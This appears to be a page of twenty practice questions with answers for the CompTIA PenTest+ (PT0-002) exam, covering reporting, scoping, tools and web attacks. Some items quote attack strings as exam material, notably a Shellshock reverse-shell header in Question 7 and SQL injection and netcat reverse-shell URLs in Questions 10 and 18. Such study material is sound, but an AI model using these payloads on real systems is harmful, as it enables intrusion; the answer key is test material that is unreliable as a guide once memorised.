Free PT0-002 Sample Questions — CompTIA PenTest+ Certification Exam

Free PT0-002 sample questions for the CompTIA PenTest+ Certification Exam. No account required: study at your own pace.

Question 1

Which of the following components should a penetration tester most likely include in a report at the end of an assessment?

  • A. Metrics and measures
  • B. Client interviews
  • C. Compliance information
  • D. Business policies

Correct Answer: A. Metrics and measures

Question 2

A penetration tester wants to find hidden information in documents available on the web at a particular domain. Which of the following should the penetration tester use?

  • A. Netcraft
  • B. CentralOps
  • C. Responder
  • D. FOCA

Correct Answer: D. FOCA

Question 3

A penetration tester is testing a company's public APIs. In researching the API URLs, the penetration tester discovers that the URLs resolve to a cloud-hosted WAF service that is blocking the penetration tester's attack attempts. Which of the following should the tester do to best ensure the attacks will be more successful?

  • A. Increase the volume of attacks to enable more to possibly slip through
  • B. Vary the use of upper and lower case characters in payloads to fool the WAF
  • C. Use multiple source IP addresses for the attack traffic to prevent being blocked
  • D. Locate the company's servers that are hosting the API and send the traffic there

Correct Answer: D. Locate the company's servers that are hosting the API and send the traffic there

Question 4

During a web application test, a penetration tester was able to navigate to https://company.com and view all links on the web page. After manually reviewing the pages, the tester used a web scanner to automate the search for vulnerabilities. When returning to the web application, the following message appeared in the browser: "unauthorized to view this page". Which of the following BEST explains what occurred?

  • A. The SSL certificates were invalid
  • B. The tester IP was blocked
  • C. The scanner crashed the system
  • D. The web page was not found

Correct Answer: B. The tester IP was blocked

Question 5

A penetration tester joins the assessment team in the middle of the assessment. The client has asked the team, both verbally and in the scoping document, not to test the production networks. However, the new tester is not aware of this request and proceeds to perform exploits in the production environment. Which of the following would have MOST effectively prevented this misunderstanding?

  • A. Prohibiting exploitation in the production environment
  • B. Requiring all testers to review the scoping document carefully
  • C. Never assessing the production networks
  • D. Prohibiting testers from joining the team during the assessment

Correct Answer: B. Requiring all testers to review the scoping document carefully

Question 6

A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet. Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be valid?

  • A. PLCs will not act upon commands injected over the network
  • B. Supervisors and controllers are on a separate virtual network by default
  • C. Controllers will not validate the origin of commands
  • D. Supervisory systems will detect a malicious injection of code/commands

Correct Answer: C. Controllers will not validate the origin of commands

Question 7

A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code:

exploit = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}

Which of the following edits should the tester make to the script to determine the user context in which the server is being run?

  • A. exploit = {"User-Agent": "() { ignored;};/bin/bash -i id;whoami", "Accept": "text/html,application/xhtml+xml,application/xml"}
  • B. exploit = {"User-Agent": "() { ignored;};/bin/bash -i>& find / -perm -4000", "Accept": "text/html,application/xhtml+xml,application/xml"}
  • C. exploit = {"User-Agent": "() { ignored;};/bin/sh -i ps -ef" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
  • D. exploit = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/10.10.1.1/80" 0>&1" "Accept": "text/html,application/xhtml+xml,application/xml"}

Correct Answer: A. exploit = {"User-Agent": "() { ignored;};/bin/bash -i id;whoami", "Accept": "text/html,application/xhtml+xml,application/xml"}

Question 8

During an assessment, a penetration tester was able to access the organization's wireless network from outside of the building using a laptop running Aircrack-ng. Which of the following should be recommended to the client to remediate this issue?

  • A. Changing to Wi-Fi equipment that supports strong encryption
  • B. Using directional antennae
  • C. Using WEP encryption
  • D. Disabling Wi-Fi

Correct Answer: A. Changing to Wi-Fi equipment that supports strong encryption

Question 9

A penetration tester is testing an Android application. Which of the following specialized tools would be best to use during the test?

  • A. Burp Suite
  • B. Drozer
  • C. Ettercap
  • D. Frida

Correct Answer: B. Drozer

Question 10

A red team completed an engagement and provided the following example in the report to describe how the team gained access to a web server:

x' OR role LIKE '%admin%

Which of the following should be recommended to remediate this vulnerability?

  • A. Multifactor authentication
  • B. Encrypted communications
  • C. Secure software development life cycle
  • D. Parameterized queries

Correct Answer: D. Parameterized queries

Question 11

A penetration tester initiated the transfer of a large data set to verify a proof-of-concept attack as permitted by the ROE. The tester noticed the client's data included PII, which is out of scope, and immediately stopped the transfer. Which of the following MOST likely explains the penetration tester's decision?

  • A. The tester had the situational awareness to stop the transfer
  • B. The tester found evidence of prior compromise within the data set
  • C. The tester completed the assigned part of the assessment workflow
  • D. The tester reached the end of the assessment time frame

Correct Answer: A. The tester had the situational awareness to stop the transfer

Question 12

A penetration tester wants to accomplish ARP poisoning as part of an attack. Which of the following tools will the tester MOST likely utilize?

  • A. Wireshark
  • B. Netcat
  • C. Nmap
  • D. Ettercap

Correct Answer: D. Ettercap

Question 13

A penetration tester discovered a new exploit and would like to create a Metasploit module. Which of the following programming languages would be best for the penetration tester to use?

  • A. JavaScript
  • B. Python
  • C. Perl
  • D. Ruby

Correct Answer: D. Ruby

Question 14

In the process of active service enumeration, a penetration tester identifies an SMTP daemon running on one of the target company's servers. Which of the following actions would best enable the tester to perform phishing in a later stage of the assessment?

  • A. Test for RFC-defined protocol conformance
  • B. Attempt to brute force authentication to the service
  • C. Perform a reverse DNS query and match to the service banner
  • D. Check for an open relay configuration

Correct Answer: D. Check for an open relay configuration

Question 15

Which of the following tools would be BEST suited to perform a manual web application security assessment? (Choose two.)

  • A. OWASP ZAP
  • B. Nmap
  • C. Nessus
  • D. BeEF
  • E. Hydra
  • F. Burp Suite

Correct Answer:
  • A. OWASP ZAP
  • F. Burp Suite

Question 16

A penetration tester is testing a client's infrastructure and discovers an API that provides information about the infrastructure that can be used to configure or manage the instances. The penetration tester uses this API to obtain temporary credentials used to access the infrastructure. Which of the following types of attacks did the penetration tester use?

  • A. Direct-to-origin
  • B. Side-channel
  • C. Cloud malware injection
  • D. Metadata service

Correct Answer: D. Metadata service

Question 17

While performing the scanning phase of a penetration test, the penetration tester runs the following command:

nmap -n -vv -sV -p- 10.10.10.23-28

After the Nmap scan is finished, the penetration tester notices all hosts seem to be down. Which of the following options should the penetration tester try NEXT?

  • A. -sU
  • B. -Pn
  • C. -sn
  • D. -sS

Correct Answer: B. -Pn

Question 18

A penetration tester examines a web-based shopping catalog and discovers the following URL when viewing a product in the catalog:

http://company.com/catalog.asp?productid=22

The penetration tester alters the URL in the browser to the following and notices a delay when the page refreshes:

http://company.com/catalog.asp?productid=22;WAITFOR DELAY'00:00:05'

Which of the following should the penetration tester attempt NEXT?

  • A. http://company.com/catalog.asp?productid=22:EXEC xp_cmdshell 'whoami'
  • B. http://company.com/catalog.asp?productid=22' OR 1=1 --
  • C. http://company.com/catalog.asp?productid=22' UNION SELECT 1,2,3 --
  • D. http://company.com/catalog.asp?productid=22;nc 192.168.1.22 4444 -e /bin/bash

Correct Answer: B. http://company.com/catalog.asp?productid=22' OR 1=1 --

Question 19

A new client hired a penetration-testing company for a month-long contract for various security assessments against the client's new service. The client is expecting to make the new service publicly available shortly after the assessment is complete and is planning to fix any findings, except for critical issues, after the service is made public. The client wants a simple report structure and does not want to receive daily findings. Which of the following is most important for the penetration tester to define FIRST?

  • A. Establish the format required by the client
  • B. Establish the threshold of risk to escalate to the client immediately
  • C. Establish the method of potential false positives
  • D. Establish the preferred day of the week for reporting

Correct Answer: B. Establish the threshold of risk to escalate to the client immediately

Question 20

Based on the information in a report from a web application scanner, a website is susceptible to clickjacking. Which of the following techniques would be best to use to prove this exploit?

  • A. Capturing and replaying a session ID
  • B. Redirecting the user with a CSRF
  • C. Launching the website in an inline frame (iframe)
  • D. Pulling server headers

Correct Answer: C. Launching the website in an inline frame (iframe)
